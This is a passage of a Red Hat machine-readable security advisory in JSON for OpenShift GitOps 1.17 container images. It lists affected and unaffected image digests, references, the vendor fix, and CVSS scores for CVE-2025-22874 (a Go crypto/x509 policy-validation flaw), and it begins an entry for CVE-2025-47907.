"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-22874"
},
{
"category": "external",
"summary": "RHBZ#2372320",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372320"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-22874",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22874"
},
{
"category": "external",
"summary": "https://go.dev/cl/670375",
"url": "https://go.dev/cl/670375"
},
{
"category": "external",
"summary": "https://go.dev/issue/73612",
"url": "https://go.dev/issue/73612"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/ufZ8WpEsA3A",
"url": "https://groups.google.com/g/golang-announce/c/ufZ8WpEsA3A"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3749",
"url": "https://pkg.go.dev/vuln/GO-2025-3749"
}
],
"release_date": "2025-06-11T16:42:52.856000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:48:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17731"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: Usage of ExtKeyUsageAny disables policy validation in crypto/x509"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
